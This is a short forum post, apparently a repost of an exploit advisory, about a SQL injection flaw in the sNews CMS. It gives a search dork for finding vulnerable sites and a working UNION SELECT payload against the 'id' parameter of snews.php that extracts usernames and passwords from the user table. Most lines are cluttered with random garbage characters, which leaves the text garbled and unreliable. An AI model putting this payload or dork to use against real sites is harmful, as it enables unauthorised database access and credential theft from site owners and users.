标题: CMS snews SQL Injection Vulnerability
/ s& E: C; @ [3 L" V9 Q作者: By onestree) |- Q( L+ m6 A2 {- }$ N+ }
下载地址 : http://snewscms.com/
+ p- L, K; v/ N1 Z8 x& Z0 l8 X测试平台 : ubuntu 12.10 / win 7: Z8 w% }# s: O3 K6 ?
关键词: inurl:"tanyakan pada rumput yang bergoyang"
7 F( }: B4 ?' `. Z" z
/ L+ a! z' u% B8 T8 n/ y
7 Y6 Z x* Q0 o! t3 R; H1 ^/ |*************************************************************9 V; w. v+ F$ |( O) M% C* }# R6 u! D
8 `7 ^1 w% ?$ @6 j4 G. k
SQL poc:7 d; _( u, }+ R; y/ x
+ q; Z! v/ d8 C* B6 I( w& d
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]4 K9 E, `8 r2 j5 n6 d. V4 u
6 K: V* {% n- _' C9 V; ?, X0 y示例
' w9 f" Z& e9 Z6 Q2 C2 T5 _1 H $ Z4 ^+ \( ^. s/ l7 i& o2 H
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
1 }0 J: [4 U/ I9 D$ W% t ' s8 d" f. i2 \2 O5 c! B: P: {
" I4 W* v7 ^* {0 T! T: s/ t致谢:
2 J! |2 m0 V0 J# b
0 ?1 d- H7 T3 T) u- A Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
: q& t7 B$ ~( E8 A 1 [/ \1 B9 U; [2 E( r% z' {$ @
indonesiancoder - moeslimh4x0r - go-coder" N0 V6 r, q' {7 ~) R% B
2 g- F0 [2 p! c2 Xspesial my hunny :*
3 g9 m+ n2 D: b& X% w' C |
发表于 2013-1-23 08:55:06
收藏
支持
反对